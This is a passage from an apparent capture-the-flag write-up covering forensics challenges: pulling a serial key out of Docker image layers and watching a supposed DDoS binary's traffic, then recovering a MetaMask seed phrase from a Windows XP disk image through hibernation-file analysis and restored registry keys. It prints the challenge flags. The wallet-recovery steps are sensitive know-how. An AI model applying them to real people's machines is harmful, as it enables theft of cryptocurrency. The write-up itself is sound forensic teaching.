&lt;span class=&#34;comment&#34;&gt;#(nop) COPY dir:48e5409ee398a470a…   5.4MB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4937520ae206   6 weeks ago      /bin/sh -c &lt;span class=&#34;built_in&#34;&gt;set&lt;/span&gt; -x     &amp;amp;&amp;amp; apkArch=&lt;span class=&#34;string&#34;&gt;&amp;quot;&lt;span class=&#34;subst&#34;&gt;$(cat /etc…   29.6MB&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;subst&#34;&gt;&lt;span class=&#34;string&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c #(nop)&lt;/span&gt;  ENV NJS_VERSION=0.7.12       0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c #(nop)  CMD [&amp;quot;&lt;/span&gt;nginx&lt;span class=&#34;string&#34;&gt;&amp;quot; &amp;quot;&lt;/span&gt;-g&lt;span class=&#34;string&#34;&gt;&amp;quot; &amp;quot;&lt;/span&gt;daemon…   0B&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  STOPSIGNAL SIGQUIT           0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  EXPOSE 80                    0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  ENTRYPOINT [&amp;quot;/docker-entr…   0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) COPY file:e57eef017a414ca7…   4.62kB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) COPY file:36429cfeeb299f99…   3.01kB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) COPY file:d4375883ed5db364…   276B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) COPY file:5c18272734349488…   2.12kB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) COPY file:7b307b62e82255f0…   1.62kB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;built_in&#34;&gt;set&lt;/span&gt; -x     &amp;amp;&amp;amp; addgroup -g 101 -S …   4.74MB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  ENV PKG_RELEASE=1            0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  ENV NGINX_VERSION=1.25.1     0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  LABEL maintainer=NGINX Do…   0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  CMD [&amp;quot;/bin/sh&amp;quot;]              0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      6 weeks ago      /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) ADD file:828b07e74c184e7f2…   7.05MB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;This is a webserver! Something important is here. No one can ignore the  &lt;code&gt;Serial-Key.txt&lt;/code&gt;  file&lt;br&gt;
We will get it later! Let’s run the web app now&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ sudo docker run --name kubersex -p 81:80 medrafk8s/kubersex&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;/docker-entrypoint.sh: /docker-entrypoint.d/ is not empty, will attempt to perform configuration&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;/docker-entrypoint.sh: Looking &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; shell scripts &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; /docker-entrypoint.d/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;/docker-entrypoint.sh: Launching /docker-entrypoint.d/10-listen-on-ipv6-by-default.sh&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10-listen-on-ipv6-by-default.sh: info: Getting the checksum of /etc/nginx/conf.d/default.conf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10-listen-on-ipv6-by-default.sh: info: Enabled listen on IPv6 &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; /etc/nginx/conf.d/default.conf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;/docker-entrypoint.sh: Sourcing /docker-entrypoint.d/15-local-resolvers.envsh&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;/docker-entrypoint.sh: Launching /docker-entrypoint.d/20-envsubst-on-templates.sh&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;/docker-entrypoint.sh: Launching /docker-entrypoint.d/30-tune-worker-processes.sh&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;/docker-entrypoint.sh: Configuration complete; ready &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; start up&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2023/08/02 17:37:52 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: using the &amp;quot;epoll&amp;quot; event method&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2023/08/02 17:37:52 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: nginx/1.25.1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2023/08/02 17:37:52 [notice] 1&lt;span class=&#34;comment&#34;&gt;#1: built by gcc 12.2.1 20220924 (Alpine 12.2.1_git20220924-r4)&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Mmm there is a Download button! Press it and you will get a binary! Bingo! This is the malicious release!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/jDkGJef.png&#34; alt=&#34;The web app&#34;&gt;&lt;/p&gt;
&lt;p&gt;After checking the binary and run it, we found that the binary requires a serial key! Let’s recover that file!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ docker save medrafk8s/medraf &amp;gt; image.tar &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ tar -xf image.tar &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ &lt;span class=&#34;built_in&#34;&gt;cd&lt;/span&gt; aae4861ba6bde0fbe820ba547bbe794c7c7e9c8be14c8972a6691eaa584161bc&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ tar -xf layer.tar &amp;amp;&amp;amp; &lt;span class=&#34;built_in&#34;&gt;ls&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Serial-Key.txt  VERSION  json  layer.tar&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And this is the content of the file !&lt;/p&gt;
&lt;figure class=&#34;highlight plaintext&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;I will put the serial key in the container image in case you forget! YOU FOOOOL YOU USED TO FORGET IT! GO AND DESTROY THE SERVICE WITH THE BOSS HOST!&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;KEY:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;KFTV-RCFL-VC5W-HX3X&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;blockquote&gt;
&lt;p&gt;At this point you can reverse the binary and get the flag! or patch the binary to change a IP server with your choice! In this step reversing is the main idea so i put a public IP of a reachable server to make the binary send packets when players decice to run it !&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let’s continue:&lt;/p&gt;
&lt;p&gt;Run the binary again and insert that key! It seems the binary works! I bet this is the responsible binary for the DDoS attack! So, I will check the behavior of this binary and open Wireshark while this one is running!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/Opesxe5.png&#34; alt=&#34;Record Traffic with Wireshark&#34;&gt;&lt;/p&gt;
&lt;p&gt;Mmmm this is http flow! Let’s check the requests!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/tzWSbjW.png&#34; alt=&#34;We got the flag!&#34;&gt;&lt;/p&gt;
&lt;p&gt;Binggo we got the flag! The flag is on the http header&lt;/p&gt;
&lt;p&gt;FLAG:  &lt;code&gt;Securinets&amp;#123;c03cefb79791e431011d0f86de9dd83aee67aebcec946bfefad00cd4807fc9c3&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;h2 id=&#34;jackpot&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#jackpot&#34;&gt;#&lt;/a&gt; Jackpot&lt;/h2&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/GONLlyG.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;We were able to find a left-behind cranky old cartel laptop in hibernation state. We believe that this device can help us retrieve the cartel’s crypto-currency wallet and withdraw their future gains.&lt;/p&gt;
&lt;p&gt;We know that the cartel uses an intranet to communicate their news within couple of blocks in the city undergrounds.&lt;/p&gt;
&lt;p&gt;Provided this intellisense, can you win us the jackpot? Wrap your finding in Securinets as indicated below.&lt;/p&gt;
&lt;p drug-enforcement-administration-for-the-win-style=&#34;&#34;&gt;Flag format: Securinets&lt;/p&gt;
&lt;p&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9hZG1pZGEwdWk=&#34;&gt;adm &amp;amp; mida0ui&lt;/span&gt;&lt;/p&gt;
&lt;h3 id=&#34;attachment&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#attachment&#34;&gt;#&lt;/a&gt; Attachment&lt;/h3&gt;
&lt;p&gt;Given a disk image,  &lt;code&gt;disk.img&lt;/code&gt; . The disk image is a raw disk image, and can be investigated using FTK Imager.&lt;br&gt;
&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xU3M0UVRRaTRYYlJYYlRmeTNGVTBuRGJxZVBGaHVSRkkvdmlldz91c3A9c2hhcmluZw==&#34;&gt;https://drive.google.com/file/d/1Ss4QTQi4XbRXbTfy3FU0nDbqePFhuRFI/view?usp=sharing&lt;/span&gt;&lt;/p&gt;
&lt;h3 id=&#34;writeup&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#writeup&#34;&gt;#&lt;/a&gt; Writeup&lt;/h3&gt;
&lt;p&gt;The disk image is a raw disk image, and can be investigated using FTK Imager. The disk image contains a single partition, which is a Windows XP installation.&lt;/p&gt;
&lt;p&gt;Looking at the root of the disk image, we can see a few interesting files:&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/Qx1z5zy.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Documents and Settings&lt;/code&gt;  - Contains the user profiles of the system&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Program Files&lt;/code&gt;  - Contains the installed programs&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Windows&lt;/code&gt;  - Contains the Windows installation files&lt;/li&gt;
&lt;li&gt;&lt;code&gt;pagefile.sys&lt;/code&gt;  - The page file of the system, aka swap file, which holds the memory of the system when it is not in use or when it is not enough RAM to hold the memory of the system.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;hiberfil.sys&lt;/code&gt;  - The hibernation file of the system, which contains the memory of the system when it is hibernated.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;System Volume Information&lt;/code&gt;  - Contains the shadow copies of the system, which is a backup of the system files. It is used to restore the system in case of a system failure. It is also used by the Windows Backup utility to create a backup of the system. It is also used by the Windows Restore utility to restore the system to a previous state. This folder is present in all disk images, people are usually not interested in it. However, it is very interesting in this case, as it contains a folder named  &lt;code&gt;_restore&amp;#123;xxxxxx&amp;#125;&lt;/code&gt; . This folder contains a file named  &lt;code&gt;RPx&lt;/code&gt; , this cleary a restore point of the system. We will investigate it later as well.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;and the rest of the stuff that would really find in any Windows disk…&lt;/p&gt;
&lt;p&gt;Let’s start with the fact that the laptop was in hibernation mode, we know for a fact that the hiberfil.sys stores the memory content at hibernation, maybe we can treat it as an actual memory and find the intranet chat!!?&lt;/p&gt;
&lt;p&gt;Googling a bit, I found this (Superuser question)[&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9zdXBlcnVzZXIuY29tL3F1ZXN0aW9ucy82NjA2NDkvaG93LXRvLXJlYWQtd2luZG93cy1oaWJlcm5hdGlvbi1maWxlLWhpYmVyZmlsLXN5cy10by1leHRyYWN0LWRhdGE=&#34;&gt;https://superuser.com/questions/660649/how-to-read-windows-hibernation-file-hiberfil-sys-to-extract-data&lt;/span&gt;] and it says that if we convert the hiberfile.sys file to a raw image, we can use Volatility to analyze it!&lt;/p&gt;
&lt;p&gt;and this is the command to use, as indicated:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol -f hiberfil.sys --profile WinXPSP3x86 imagecopy -O hiberfil.raw&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/AgJlPlG.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Cool, we hope now we can use Volatility to analyze the hiberfil.raw file. Let’s start by checking the processes and commands history.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/MGjHNpu.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Cmdscan now maybe!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/8KCPq36.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;There we go, we can see what they meant by the legacy, old school chat. They were using  &lt;code&gt;msg.exe&lt;/code&gt;  to communicate with each other. This is a very old program, and it is used to send messages to other users in the same network. It is very similar to the LAN messenger that we found earlier, but it is a command line program.  &lt;code&gt;msg&lt;/code&gt;  can also be used to transmit files as well.&lt;/p&gt;
&lt;p&gt;The chat goes with the description and indicates that our guy got some kind of password that was placed in a certain registry key and permanetly deleted it after.&lt;/p&gt;
&lt;p&gt;Now, let’s further investigate the programs now to build an understanding around this situation&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/NGRW8VU.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;We only see Chrome to be the only interesting thing in this disk evidence.&lt;/p&gt;
&lt;p&gt;We know the crypto-currency part might need some searching to know that Metamask the most famous crypto wallet is a browser extension!!&lt;/p&gt;
&lt;p&gt;And yeah, Metamask is being used in Chrome. Metamask is a browser extension that allows you to use Ethereum, Binance Chain, and more. It is a very popular extension, and it is used by a lot of people. Metamask gives you a wallet address, and you can use it to send and receive cryptocurrencies whether in the Ethereum network, BSC network, or custom networks. But an address is only the public key you use to send and receive, we are looking further than that, we want the private one to be able to control the wallet completely.&lt;/p&gt;
&lt;p&gt;Metamask Extension for Chrome&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/wWzkTjZ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Could there be an active wallet within Metamask? Let’s check it out.&lt;/p&gt;
&lt;p&gt;Usually the extension data is stored within the ‘Local Extension Settings’ folder. And as expected, that folder contains some interesting files.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/t8T8lYY.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;The  &lt;code&gt;Local Extension Settings&lt;/code&gt;  folder contains a folder named  &lt;code&gt;nkbihfbeogaeaoehlefnkodbefgpgknn&lt;/code&gt; , which is the ID of the Metamask extension. This folder contains a file named 0000xx.ldb, which is a DB file. Let’s check it out.&lt;/p&gt;
&lt;p&gt;According to this &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9ldGhlcmV1bS5zdGFja2V4Y2hhbmdlLmNvbS9xdWVzdGlvbnMvNTI2NTgvd2hlcmUtZG9lcy1tZXRhbWFzay1zdG9yZS10aGUtd2FsbGV0LXNlZWQtZmlsZS1wYXRo&#34;&gt;Ethereum Stackexchange question&lt;/span&gt;. We could be able to completely control the existing wallet if we have the password. Could the challenge be all about that? and how to get the wallet password?&lt;/p&gt;
&lt;p&gt;Yes it is possible, and we will get back to it later, for now, finding password is the priority!! We know it is a registry key, that was deleted.&lt;/p&gt;
&lt;p&gt;Let’s think how we can RESTORE it xD&lt;/p&gt;
&lt;p&gt;Is it the time, to investigate the  &lt;code&gt;_restore&amp;#123;xxxxxx&amp;#125;&lt;/code&gt;  folder? right?&lt;/p&gt;
&lt;p&gt;We can make use of a VM, however (OP: says the disk must not be converted back to vmdk whether by using a different file format or breaking the boot files). This way we can’t use a VM to check the restore point. So, we have to do it manually. My idea is to spin my own Windows XP on VMware, you can get the ISO officially by Microsoft with serial number from the WayBackMachine SP3 and x86 of course. After that we create a dummy restore point and modify its files by copying the RP folders from  &lt;code&gt;System Volume Information&lt;/code&gt;  and then we can proceed to perform a restore point to see what is inside. I hope you can understand what I mean here.&lt;/p&gt;
&lt;p&gt;(OP Note: for order I guess I will accept any provided order or make the user follow the order as shown in the leaked chat.)&lt;/p&gt;
&lt;p&gt;Let’s do it.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Spinning a new Windows XP machine&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/gAJWn0m.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Creating a dummy restore point or just get the disk UUID, anyways we need Windows to create a restore point folder for us, so let’s do it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/hoZj5DU.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Copying the RP folders from the Disk image  &lt;code&gt;System Volume Information&lt;/code&gt;  to the new VM’s  &lt;code&gt;System Volume Information&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Export the restore folder from System Volume Information to your desktop or some folder.&lt;/p&gt;
&lt;p&gt;Adjust these folder options on Windows XP VM&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/LH8W47T.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Then use this command to gain access to the System Volume Information folder&lt;/p&gt;
&lt;figure class=&#34;highlight powershell&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;cacls &lt;span class=&#34;string&#34;&gt;&amp;quot;C:\System Volume Information&amp;quot;&lt;/span&gt; /E /G Administrator:F&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;It can be administrator, Everyone or your specific VM username.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/6JWtrGQ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Then copy the restore folder contents to the System Volume Information folder&lt;/p&gt;
&lt;p&gt;This is the current dummy restore point we made&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/ReEeaE9.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;We add the exported RP5 and RP6 folders from the disk image with them&lt;/p&gt;
&lt;p&gt;In each of the folders there is a  &lt;code&gt;drivetable.txt&lt;/code&gt;  file that contains the old disk UUID, we need to replace it with the new one.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Modifying Disk UUID in the restore point&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can also modify the  &lt;code&gt;domain.txt&lt;/code&gt;  since it contains the old user-id but I believe the Restore point utility can very much detect the change.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Restoring the system like if it was a real restore point we made.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/NW9lTab.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;We can see a new entry added called “restore_point”, so let’s proceed with it!&lt;/p&gt;
&lt;p&gt;This is the domain thing, hit ‘OK’&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/VMADEqo.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;We wait for a quick restart.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/X1drpyr.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And that’s a success!&lt;/p&gt;
&lt;p&gt;Let’s open the registry now, shall we?&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/ynNyJqX.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And there we go, a key named password containing a string named deleteMe! Bingo!&lt;/p&gt;
&lt;p&gt;At this point, there is only one thing left, let’s get the flag!&lt;/p&gt;
&lt;p&gt;Remember that Ethereum stack exchange question I mentioned earlier? here is the link again, also bring the content of the ldb file’s vault which is near the word “keyring”, you can CTRL+F that in the ldb files and adjust the format if some letters are escaped or encoded because data is never lost, you can also upload the whole file to the &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9tZXRhbWFzay5naXRodWIuaW8vdmF1bHQtZGVjcnlwdG9yLw==&#34;&gt;tool&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9ldGhlcmV1bS5zdGFja2V4Y2hhbmdlLmNvbS9xdWVzdGlvbnMvNTI2NTgvd2hlcmUtZG9lcy1tZXRhbWFzay1zdG9yZS10aGUtd2FsbGV0LXNlZWQtZmlsZS1wYXRo&#34;&gt;https://ethereum.stackexchange.com/questions/52658/where-does-metamask-store-the-wallet-seed-file-path&lt;/span&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/FxNDjWP.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/Mhm1M63.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s get our flag now&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/3tK5T2J.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Done, we have some critical information here. The seed phrase! We wrap it in Securinets&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Securinets&amp;#123;female-fire-strong-accuse-spring-update-bird-exchange-home-embark-latin-mom&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Thanks for reading, we hope you enjoyed it, and we will be happy to hear your feedback and suggestions.&lt;/p&gt;
&lt;p&gt;GGs &lt;strong&gt;itunderground&lt;/strong&gt; for solving this challenge&lt;/p&gt;
&lt;h3 id=&#34;idea-and-final-words&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#idea-and-final-words&#34;&gt;#&lt;/a&gt; Idea and Final Words&lt;/h3&gt;
&lt;p&gt;Just wanted to use pagefile.sys, hiberfile.sys, the Metamask thing, and Restore points because nobody used them like this in a CTF. So don’t know if that’s a great thing or rather will make players frustrated. Yet, tried to make everything as clear as possible for the players to understand and enjoy the challenge as a whole.&lt;/p&gt;
&lt;h2 id=&#34;raf-hide&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#raf-hide&#34;&gt;#&lt;/a&gt; Raf Hide&lt;/h2&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/QRKzGoO.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
